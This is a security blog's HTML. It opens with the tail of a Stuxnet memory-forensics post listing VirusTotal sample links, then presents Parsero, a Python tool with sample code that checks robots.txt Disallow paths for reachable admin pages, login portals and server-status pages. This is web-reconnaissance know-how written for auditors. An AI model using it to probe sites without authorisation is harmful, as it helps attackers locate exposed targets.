<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fMxjlYTDNgcZjfPNPts32Qm8qyttHU9RaWuRtGndWihee-dWdNVVS8O-mCa1AjY7iNBLyA4-htLuj4Tig4X6nMLFLav3bct0sahoFwSgXxZ5cU2OGwIp310Dub7z4_NSto9SZ4f0U2U/s1600/Stuxnet_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fMxjlYTDNgcZjfPNPts32Qm8qyttHU9RaWuRtGndWihee-dWdNVVS8O-mCa1AjY7iNBLyA4-htLuj4Tig4X6nMLFLav3bct0sahoFwSgXxZ5cU2OGwIp310Dub7z4_NSto9SZ4f0U2U/s640/Stuxnet_14.png" height="104" width="640" /></a></div>
<br />
Here, you have the links to Virustotal with the report of the files which have been analyzed:<br />
<br />
<a href="https://www.virustotal.com/en/file/e97d61f7393ac5838a1800f3e9aa22c6205f4d7e2bde494573d35c57bc9b7819/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/e97d61f7393ac5838a1800f3e9aa22c6205f4d7e2bde494573d35c57bc9b7819/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/163b7da37df4ae6dafbfb5bf88b319dabf7846cee73d4192c6a7593e835857a8/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/163b7da37df4ae6dafbfb5bf88b319dabf7846cee73d4192c6a7593e835857a8/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/abce3e79e26b5116fe7f3d40d21eaa4c8563e433b6086f9ec07c2925593f69dc/analysis/" target="_blank"><span id="goog_1753205994">https://www.virustotal.com/en/file/abce3e79e26b5116fe7f3d40d21eaa4c8563e433b6086f9ec07c2925593f69dc/analysis/</span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/2b2945f7cc7cf5b30ccdf37e2adbb236594208e409133bcd56f57f7c009ffe6d/analysis/</span></span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/10f07b9fbbc6a8c6dc4abf7a3d31a01e478accd115b33ec94fe885cb296a3586/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/10f07b9fbbc6a8c6dc4abf7a3d31a01e478accd115b33ec94fe885cb296a3586/analysis/</span></span></span></a><br />
<br />
<a href="https://www.virustotal.com/en/file/a4b4b29f0df45283b629203b080c09ddb5bc6eb4cd8e9b725f75121a8b7e728e/analysis/" target="_blank"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994"><span id="goog_1753205994">https://www.virustotal.com/en/file/a4b4b29f0df45283b629203b080c09ddb5bc6eb4cd8e9b725f75121a8b7e728e/analysis/</span></span></span></span></a><br />
<br />
<span id="goog_1753205994"><span id="goog_1753205994">Notice that the majority of them have been detected as the Stuxnet worm.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvnJzSsVjAn7rx8bqcE6BDUjolPA-_opdNvms963eEluPHD4-EXWf5T4gS8uQuT1PyTIvIz6_3epLLWk7b0LEe3coevYDaSjqeAS2pDB4NwUgr9laD2GIw-dOuf4aSnQA_sifVdfp-y7M/s1600/Stuxnet_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvnJzSsVjAn7rx8bqcE6BDUjolPA-_opdNvms963eEluPHD4-EXWf5T4gS8uQuT1PyTIvIz6_3epLLWk7b0LEe3coevYDaSjqeAS2pDB4NwUgr9laD2GIw-dOuf4aSnQA_sifVdfp-y7M/s640/Stuxnet_15.png" height="298" width="640" /></a></div>
<br />
<h3>
Stuxnet Trojan - Memory Forensics with Volatility | Part II</h3>
Continue reading the second part here:<br />
<a href="http://www.behindthefirewalls.com/2014/01/stuxnet-memory-forensics-volatility-II.html">http://www.behindthefirewalls.com/2014/01/stuxnet-memory-forensics-volatility-II.html</a><br />
<br />
<br />
<span id="goog_1753205994"></span><span id="goog_1753205994"> </span><span id="goog_1753205995"></span>Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com0tag:blogger.com,1999:blog-3160485247929481680.post-79565693317240100642013-12-08T01:56:00.000-08:002014-02-05T00:37:31.790-08:00Parsero: The tool to audit the Robots.txt automatically<div style="text-align: justify;">
When I was writing <a href="http://www.behindthefirewalls.com/2013/07/using-robotstxt-to-locate-your-targets.html" target="_blank">Using robots.txt to locate your targets</a>, I felt the need to develop a tool that automates the task of auditing the robots.txt file of web servers.<br />
<br />
Now I am really proud to introduce my first tool, called <a href="https://github.com/behindthefirewalls/Parsero" target="_blank">Parsero</a>. I hope you enjoy it...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Jp-6xfNpTD9UGa71ZxKpA14nlKnpWZ13FNikztOw9Exj1D-AZw60uvLaCubI85DRuwQ1sZ3L9ITxqRbBeCrHqi1r33UztldLKzXKnNHVIcHX5xscXLddbo4nleIbx4sk731lQpy7118/s1600/Parsero_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0Jp-6xfNpTD9UGa71ZxKpA14nlKnpWZ13FNikztOw9Exj1D-AZw60uvLaCubI85DRuwQ1sZ3L9ITxqRbBeCrHqi1r33UztldLKzXKnNHVIcHX5xscXLddbo4nleIbx4sk731lQpy7118/s1600/Parsero_logo.png" /></a></div>
<h3>
Introduction</h3>
One of the things you need to do when you are auditing a website is to look at its robots.txt file, for example: <a href="http://www.behindthefirewalls.com/robots.txt" target="_blank">http://www.behindthefirewalls.com/robots.txt</a>. Web administrators write this file to tell crawlers like Google, Bing, Yahoo... what content they are allowed to index and which directories must not be indexed.<br />
<br /></div>
<div style="text-align: justify;">
<u>But... why would administrators want to hide some web directories from the crawlers?</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sometimes they want to hide the web portal login, management directories, private information, sensitive data, pages with vulnerabilities, documents, etc... If they hide these directories from the crawlers, then they can't be found through Google hacking or by searching in the search engines... But robots.txt itself is public and is served to anybody who asks for it, so every Disallow entry is also a pointer for an attacker.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Why do you need Parsero?</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We've said that administrators tell the crawlers which directories or files hosted on the web server are not allowed to be indexed. They do this by writing as many "Disallow: /URL_Path" entries as they want in the robots.txt file, pointing at those directories. Sometimes the paths listed in the Disallow entries are directly accessible to users (without using a search engine) just by visiting the URL and the path, and sometimes they are not available to anybody... Because it is really common for administrators to write a lot of Disallow entries, some of which are reachable and some of which are not, you can use Parsero to request each Disallow entry and check its HTTP status code, in order to find out automatically which of these directories are available. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
When we execute Parsero, we can see the HTTP status codes. For example, the codes below:<br />
<br /></div>
<ul>
<li>200 OK: The request has succeeded.</li>
<li>403 Forbidden: The server understood the request, but is refusing to fulfill it.</li>
<li>404 Not Found: The server hasn't found anything matching the Request-URI.</li>
<li>302 Found: The requested resource resides temporarily under a different URI.</li>
<li>... </li>
</ul>
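<div style="text-align: justify;">
The check Parsero automates, as an added example in Python that is not Parsero's own code: it pulls the Disallow entries out of a robots.txt, requests each one without following redirects, and reports which entries are openly reachable. The sample robots.txt, the fake status codes and the names parse_disallows, audit_robots and reachable are constructed for this example; point it (with fetch=http_status) at a site you administer to see which "hidden" paths are really public.</div>

```python
from urllib.parse import urljoin
from urllib.request import HTTPRedirectHandler, Request, build_opener
from urllib.error import HTTPError, URLError

def parse_disallows(robots_txt):
    """Unique Disallow paths in file order; comments and wildcard rules are skipped."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        # empty "Disallow:" allows everything; "*"/"$" are patterns, not fetchable paths
        if field.lower() == "disallow" and value and not set("*$") & set(value):
            paths.append(value)
    return list(dict.fromkeys(paths))            # de-duplicate, keep order

class _NoRedirect(HTTPRedirectHandler):          # report a 3xx as the final code
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def http_status(url, timeout=5.0):
    """Return the HTTP status code of one URL, or None on a network error."""
    try:
        req = Request(url, headers={"User-Agent": "robots-audit"})
        with build_opener(_NoRedirect()).open(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:                     # unfollowed 3xx, 4xx and 5xx land here
        return err.code
    except URLError:
        return None

def audit_robots(base_url, robots_txt, fetch=http_status):
    """Map each Disallow path to the status code its full URL answers with."""
    return {path: fetch(urljoin(base_url, path)) for path in parse_disallows(robots_txt)}

def reachable(results):                          # 200 = anybody can open it directly
    return sorted(path for path, code in results.items() if code == 200)
# Constructed sample (fake server codes included) so the demo runs offline.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/   # portal login
Disallow: /server-status/
Disallow: /old-backup/
Disallow: /*.php
Disallow:
"""
FAKE_CODES = {"/admin/": 200, "/server-status/": 200, "/old-backup/": 404}
def demo():
    fake = lambda url: FAKE_CODES.get(url.replace("https://www.example.com", ""), 403)
    return audit_robots("https://www.example.com", SAMPLE_ROBOTS, fetch=fake)
```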
<h3>
Installation</h3>
Parsero needs at least Python 3 and can be executed on every operating system that supports this language. It also needs urllib3.<br />
<pre class="brush: bash">sudo apt-get install python3
sudo apt-get install python3-pip
sudo pip-3.3 install urllib3
</pre>
When you have installed this software, just download the project from:
<br /><br />
<a href="https://github.com/behindthefirewalls/Parsero" target="_blank">https://github.com/behindthefirewalls/Parsero</a><br />
<br />
<a href="https://github.com/behindthefirewalls/Parsero/archive/master.zip" target="_blank">https://github.com/behindthefirewalls/Parsero/archive/master.zip</a><br />
<br />
In Linux you can use the command below.<br />
<br />
<pre class="brush: bash">git clone https://github.com/behindthefirewalls/Parsero.git</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCSJwt9xyEHNt6689e6vWTYQLTOTUeyqEgFMTR7PCtk_oTPzCL9ZEPF7AI0Nlns74RbyNRhvDjyBKS58CVDdFL2HGwomNmmqlACURqxRMS2i2wIiowYw9UgWmR51kEEHw4YXju92RyNI/s1600/Parsero1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCSJwt9xyEHNt6689e6vWTYQLTOTUeyqEgFMTR7PCtk_oTPzCL9ZEPF7AI0Nlns74RbyNRhvDjyBKS58CVDdFL2HGwomNmmqlACURqxRMS2i2wIiowYw9UgWmR51kEEHw4YXju92RyNI/s1600/Parsero1.png" /></a></div>
<br />
When you download Parsero, you will see a folder with three files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Crg0rpIRJzir1shNBwbbbwvEXb-J9ptEpV31hJx4v8wOTLOFMDqBvvoeOVr3-_TwgsT5cfuQ2hI62vJvX5_9PSatbfYq10Pm1m5aH_Uoc_0xNsXrd1fXBguIvLlDzf7_yjyK0CAGsbo/s1600/Parsero_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Crg0rpIRJzir1shNBwbbbwvEXb-J9ptEpV31hJx4v8wOTLOFMDqBvvoeOVr3-_TwgsT5cfuQ2hI62vJvX5_9PSatbfYq10Pm1m5aH_Uoc_0xNsXrd1fXBguIvLlDzf7_yjyK0CAGsbo/s1600/Parsero_2.png" /></a></div>
<br />
<div style="text-align: justify;">
Before starting, you need to check that your default Python version is 3 or later. If you have already installed Python 3 but it is not your default version, run the script with "python3 parsero.py" instead of "python parsero.py".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinBYLkGByC-y9dm4Rj94tv3iKvhwsOi3asz8audbnDQftYeUrol5LRzFvPPN21LRT7gPBhzXp-OXcXg1T2gP_mFQauwyLyEPBz9gTQuy7RvZNmPbpWJg4XZJcTlYh1rVUNEtECrmMiB9E/s1600/Parsero_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinBYLkGByC-y9dm4Rj94tv3iKvhwsOi3asz8audbnDQftYeUrol5LRzFvPPN21LRT7gPBhzXp-OXcXg1T2gP_mFQauwyLyEPBz9gTQuy7RvZNmPbpWJg4XZJcTlYh1rVUNEtECrmMiB9E/s1600/Parsero_3.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
If you don't type any argument, you will see the help below.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHXy4HbFLe0xv61_VwaK-rTV_-cE0r0-H0grta9gHezW86_3H1ZPV1XoU3Q2DOn9xwOXvoTjU3bnAYx7obRNyEYys_keG2J10-5SAAVsmSdEMpevR6OMmiNoOuoK2q39WKpGgFmT-esI/s1600/Parsero_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaHXy4HbFLe0xv61_VwaK-rTV_-cE0r0-H0grta9gHezW86_3H1ZPV1XoU3Q2DOn9xwOXvoTjU3bnAYx7obRNyEYys_keG2J10-5SAAVsmSdEMpevR6OMmiNoOuoK2q39WKpGgFmT-esI/s1600/Parsero_4.png" /></a></div>
<br />
<h3>
Example 1</h3>
<div style="text-align: justify;">
In the picture below you can see the robots.txt file of a web server in one of my environments. If you are a web security auditor, you should check every Disallow entry in order to try to get some valuable information: the auditor wants to know which directories or files hosted on the web servers the administrators don't want published on the search engines.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuN2wV88wjSmHwe96dQIo1wAFPvIRIexPFXMJzKWbi7GSBrZ2fICXeZOMwvf4-vgSxxw6u5f2VJTbtPhnt91XDjcvj2SAgxqGgaQ6i4v3QSaFZiOMBVlb1_l77nBy0zXZTApBYWt6iZVU/s1600/Parsero_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuN2wV88wjSmHwe96dQIo1wAFPvIRIexPFXMJzKWbi7GSBrZ2fICXeZOMwvf4-vgSxxw6u5f2VJTbtPhnt91XDjcvj2SAgxqGgaQ6i4v3QSaFZiOMBVlb1_l77nBy0zXZTApBYWt6iZVU/s1600/Parsero_9.png" /></a></div>
<br />
You can do this task automatically using Parsero with the command:<br />
<pre class="brush: bash">python parsero.py -u www.example.com</pre>
<br />
<div style="text-align: justify;">
Notice in the picture below that the green links are the ones that are available on the web server. You don't need to waste your time checking the other links; just click on the green ones.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNRf02JsM6kP9IXCB4NTQ-2HgpWwK1pgW3KkB3xmNdRurPf2qoRqFz2w_9y6ZIOBoQ2i5oZb2eISCs_JcWIY219wGeGLE7tejnT_UD9cK7Oz9h4Z3qIoViuVKIBM98Lu9UmZCXvwrci5o/s1600/Parsero_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNRf02JsM6kP9IXCB4NTQ-2HgpWwK1pgW3KkB3xmNdRurPf2qoRqFz2w_9y6ZIOBoQ2i5oZb2eISCs_JcWIY219wGeGLE7tejnT_UD9cK7Oz9h4Z3qIoViuVKIBM98Lu9UmZCXvwrci5o/s640/Parsero_10.png" height="340" width="640" /></a></div>
<br />
<div style="text-align: justify;">
If we visit www.example.com/server-status/ we can see the Apache server-status page, which is public but hidden from the crawlers...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU-FuT-kVcBmTnhH51RRBibN-mh_DHv7d-vwpRrqb8Z7LLFqUBLJO3Dfxwu6j3KQN67jvsSi1QGxNGPT3qfw1VU4ZbF7BTdv_5Jp4npVwoQL62tBF6-IF41SG9mIG15J0Pw10HnuzHMUk/s1600/Parsero_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU-FuT-kVcBmTnhH51RRBibN-mh_DHv7d-vwpRrqb8Z7LLFqUBLJO3Dfxwu6j3KQN67jvsSi1QGxNGPT3qfw1VU4ZbF7BTdv_5Jp4npVwoQL62tBF6-IF41SG9mIG15J0Pw10HnuzHMUk/s640/Parsero_11.png" height="204" width="640" /></a></div>
<h3>
Example 2</h3>
In the picture below you can see another robots.txt. The picture has been cropped because this server has a lot of Disallow entries. Can you imagine checking all of them manually?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHKY4_n1xbpOql2SKpTWtP5iOrskPVJlKDsWPduT-hqLDXk32UoLp0NIFa6MyJUIJS30QBgt-_iPd-5vgPCB9KFzDp5SlfFtu_i-Gcjzyb2pHyh2ePmErsWWBnhKpycZS4_qopXQVX7cE/s1600/Pasero_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHKY4_n1xbpOql2SKpTWtP5iOrskPVJlKDsWPduT-hqLDXk32UoLp0NIFa6MyJUIJS30QBgt-_iPd-5vgPCB9KFzDp5SlfFtu_i-Gcjzyb2pHyh2ePmErsWWBnhKpycZS4_qopXQVX7cE/s1600/Pasero_5.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
If you use Parsero, you will audit the whole robots.txt file in just a few seconds...</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwMIXqupinVb1JgXdZrl7xnSTmumCkMCftTBoirqpzmWy_gabU4VPKsnW4UjOtSUoEb2xyYGKvS73UjKA1tWCO1Mt2Mz-ib1UMUXFjpRYsJgVulXpbsE1FxFIUBiCaNUfLsxuhrR-waX4/s1600/Parsero_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwMIXqupinVb1JgXdZrl7xnSTmumCkMCftTBoirqpzmWy_gabU4VPKsnW4UjOtSUoEb2xyYGKvS73UjKA1tWCO1Mt2Mz-ib1UMUXFjpRYsJgVulXpbsE1FxFIUBiCaNUfLsxuhrR-waX4/s640/Parsero_6.png" height="505" width="640" /></a></div>
<br />
... and discover, for example, the portal login for this site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifrKdgCnUKSqJp14bE_uNmvLEjxz6XYimP9_kDJ07QVG4898maBgmk4o90wfixEZwTZpg6Rs3ui0S_oKy-JFIJz5574uAdMY4lDl6F0z0wyx1M9f2bkEXXRMKRiwtvxKlX_CIjRYnT02o/s1600/Parsero_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifrKdgCnUKSqJp14bE_uNmvLEjxz6XYimP9_kDJ07QVG4898maBgmk4o90wfixEZwTZpg6Rs3ui0S_oKy-JFIJz5574uAdMY4lDl6F0z0wyx1M9f2bkEXXRMKRiwtvxKlX_CIjRYnT02o/s400/Parsero_7.png" height="180" width="400" /></a></div>
<h3>
The future of Parsero</h3>
<div style="text-align: justify;">
I am working on new features for this tool, which will be delivered in the coming months... I would be really grateful for your feedback about it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I want to thank <a href="https://twitter.com/cor3dump3d" target="_blank">cor3dump3d</a> for his support and help!!! He has saved me a lot of time by sharing his knowledge of Python with me!!</div>
<br />
<br />Javier Nieto, http://www.blogger.com/profile/05976836878834402718